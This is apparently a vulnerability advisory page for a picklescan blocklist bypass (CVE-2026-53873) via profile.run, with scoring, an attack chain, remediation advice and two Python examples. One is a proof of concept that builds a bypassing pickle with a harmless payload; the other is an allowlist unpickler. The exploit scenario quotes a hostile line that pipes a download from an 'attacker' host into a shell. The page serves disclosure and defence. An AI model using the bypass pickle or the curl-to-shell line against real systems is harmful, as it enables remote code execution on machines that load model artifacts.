
picklescan CVE-2026-53873

CRITICAL
Incomplete List of Disallowed Inputs (CWE-184)
2026-06-17 VulnCheck
9.3
CVSS 4.0 · Vendor: VulnCheck

Severity by source

Vendor (VulnCheck), primary: 9.3 CRITICAL
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

vuln.today AI: 9.8 CRITICAL
Rationale: the bypass lets an attacker-supplied pickle pass a default-configured scanner and reach pickle.loads() with no authentication or user interaction, giving full code execution in the loader process (C/I/A: High).
CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS Vector (Vendor: VulnCheck)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None

Lifecycle Timeline

Source Code Evidence Fetched: Jun 17, 2026 - 16:50 (vuln.today)
Analysis Generated: Jun 17, 2026 - 16:50 (vuln.today)

Description (CVE.org)

picklescan before 1.0.4 contains an incomplete blocklist for the profile module that fails to block the module-level profile.run() function, allowing attackers to achieve arbitrary code execution via exec(). Attackers can craft malicious pickle files calling profile.run(statement) to execute arbitrary Python code while picklescan reports zero security issues.

Analysis (AI)

Arbitrary code execution bypass in picklescan before 1.0.4 allows attackers to smuggle malicious pickle files past the scanner by invoking the module-level profile.run() function, which is missing from the blocklist that only covers Profile.run and Profile.runctx. The scanner reports zero issues while pickle.loads() triggers exec() of attacker-controlled Python. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: identify a pipeline using picklescan <1.0.4
Delivery: craft a pickle invoking profile.run with the payload statement
Exploit: upload the artifact to a registry or model hub
Install: scanner returns zero issues
C2: victim deserializes the artifact via pickle.loads
Execute: exec() runs the attacker's Python
Impact: full code execution in the loader process

Vulnerability Assessment (AI)

Exploitation: The target environment must (a) use picklescan at a version below 1.0.4 as a pre-deserialization screening step and (b) subsequently call pickle.loads() (or equivalent) on a file whose contents the attacker controls, such as a third-party model checkpoint or uploaded artifact. …
Risk Assessment: The supplied CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H) and base score of 9.3 reflect that any system deserializing an attacker-supplied pickle previously cleared by picklescan can be fully compromised, which is realistic for ML model hubs, CI scanners and Hugging Face-style download pipelines. …
Exploit Scenario: An attacker uploads a malicious model or data artifact containing a pickle whose payload is profile.run("import os; os.system('curl attacker|sh')") to a repository or registry that uses picklescan <1.0.4 as its pre-deserialization safety gate. The scanner reports zero issues because the pickle's global reference is the bare name "run" in module profile, which matches neither blocklist entry "Profile.run" nor "Profile.runctx"; the downstream consumer calls pickle.loads(), profile.run() hands the statement to exec(), and it runs in the loader's process. …
Remediation: Vendor-released patch: upgrade picklescan to 1.0.4 or later, which extends the profile blocklist to also cover the module-level run function (advisory GHSA-7wx9-6375-f5wh). …
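The bypass described in the scenario above, reduced to a runnable illustration. This is an added example written for this page, not picklescan's code: the two blocklists are modelled on the advisory's description of the profile entries (the module-level runctx entry in the hardened list is this example's own assumption, since profile.runctx() also exec()s its statement), the payload statement is a harmless constructed stand-in that only sets an environment variable, and the opcode walk uses the standard library's pickletools rather than picklescan's own parser.

```python
import os
import pickle
import pickletools
import profile  # stdlib; profile.run(statement) exec()s the statement in __main__


class ProfileRunPayload:
    """Object whose __reduce__ makes the unpickler call profile.run(statement)."""

    def __init__(self, statement):
        self.statement = statement

    def __reduce__(self):
        # Pickled as GLOBAL "profile run" (protocol <= 3) or STACK_GLOBAL (protocol 4+),
        # followed by REDUCE: the shape the advisory describes.
        return (profile.run, (self.statement,))


# Constructed, harmless stand-in for the attacker's statement: it only sets an
# environment variable so that execution is observable. A real payload runs anything.
BENIGN_STATEMENT = "import os; os.environ['PICKLESCAN_DEMO'] = 'executed'"


def build_payload(statement=BENIGN_STATEMENT, protocol=4):
    return pickle.dumps(ProfileRunPayload(statement), protocol=protocol)


def global_references(data):
    """Return the (module, name) pairs resolved by GLOBAL / STACK_GLOBAL opcodes.

    STACK_GLOBAL takes its operands from the stack; this helper assumes they are
    the two most recent string opcodes, which holds for pickle.dumps output. A
    production scanner must track the memo and stack as well, because an
    attacker can supply the operands through BINGET instead.
    """
    refs, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            refs.append((module, name))
        elif op.name == "STACK_GLOBAL":
            refs.append((strings[-2], strings[-1]))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
    return refs


# Blocklists modelled on the advisory text, not copied from picklescan's source.
# The pre-1.0.4 list names only the Profile class methods, so the module-level
# function "run" is compared against "Profile.run" and never matches.
OLD_BLOCKLIST = {"profile": {"Profile.run", "Profile.runctx"}}
# Hardened list: covers the module-level run() as the advisory says; runctx() is
# added as this example's assumption because module-level profile.runctx() exec()s too.
NEW_BLOCKLIST = {"profile": {"Profile.run", "Profile.runctx", "run", "runctx"}}


def scan(data, blocklist):
    """Return the references a name-based blocklist scanner flags (empty list = 'clean')."""
    return [(m, n) for m, n in global_references(data) if n in blocklist.get(m, ())]


def demonstrate_execution(data):
    """What the downstream consumer does: pickle.loads(). Returns the marker set by exec()."""
    os.environ.pop("PICKLESCAN_DEMO", None)
    pickle.loads(data)  # profile.run(...) -> Profile.runctx -> exec(statement)
    return os.environ.get("PICKLESCAN_DEMO", "not executed")


if __name__ == "__main__":
    payload = build_payload()
    print("globals referenced:", global_references(payload))
    print("old blocklist flags:", scan(payload, OLD_BLOCKLIST))
    print("new blocklist flags:", scan(payload, NEW_BLOCKLIST))
    print("after pickle.loads:", demonstrate_execution(payload))
```

Running it shows the old blocklist flagging nothing for either pickle protocol while the hardened list flags ("profile", "run"); loading the "clean" pickle then prints profiler statistics (profile.run's side effect) and the marker proves the statement executed. The real lesson is the last line of the blocklist comment: a scanner that compares dotted names string-for-string treats a class method and a module-level function of the same name as unrelated, which is exactly the CWE-184 pattern.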

Recommended Action (AI)

Within 24 hours: upgrade picklescan to 1.0.4 or later on every pipeline that uses it as a pre-deserialization gate, and until then do not rely on it alone: block pickle deserialization of untrusted artifacts where possible, restrict unpickling to an allowlist of types (a pickle.Unpickler subclass whose find_class refuses everything not on the list), and enforce review of pickle sources. Treat any blocklist-based scanner as defence in depth rather than a guarantee; the weakness class here (CWE-184, incomplete blocklist) means other unlisted exec-equivalent callables can exist. …
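The allowlist control named in the recommendation above, as an added example that is not part of the page or of picklescan: a pickle.Unpickler subclass whose find_class refuses every global not on an explicit allowlist, so the profile.run reference is rejected at the GLOBAL opcode before any REDUCE can run. The hand-written protocol-0 pickle bytes and the OrderedDict "state_dict" are constructed samples; the allowlist contents are an assumption chosen for the demonstration.

```python
import io
import pickle
from collections import OrderedDict

# Constructed protocol-0 pickle that would call profile.run("x = 1") on load:
# GLOBAL profile.run, MARK, STRING, TUPLE, REDUCE, STOP. The statement is harmless;
# it exists only to show the allowlist stopping the call before it happens.
PROFILE_RUN_PICKLE = b"cprofile\nrun\n(S'x = 1'\ntR."

# Constructed benign artifact shaped like a state_dict. It references one global
# (collections.OrderedDict), so the allow path is exercised and not merely skipped.
BENIGN_PICKLE = pickle.dumps(
    OrderedDict([("layer.weight", [0.1, 0.2]), ("layer.bias", [0.0])]), protocol=4
)

# Assumed allowlist of globals this consumer is willing to resolve. Everything
# else, including profile.run, profile.Profile.run, os.system and builtins.exec,
# is refused; unlike a blocklist, a name nobody thought of is denied by default.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global not on the allowlist (the inverse of a blocklist)."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_load(data):
    """Return ("ok", obj) or ("rejected", reason). A rejection is raised while
    resolving the GLOBAL opcode, before REDUCE runs, so the payload never executes."""
    try:
        return ("ok", safe_loads(data))
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    print(try_load(PROFILE_RUN_PICKLE))
    print(try_load(BENIGN_PICKLE))
```

Note that plain dicts, lists, strings and numbers never pass through find_class at all, so a tight allowlist costs nothing for data-only artifacts; every entry you add (a tensor class, a custom layer) is a deliberate trust decision rather than an omission waiting to be found.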

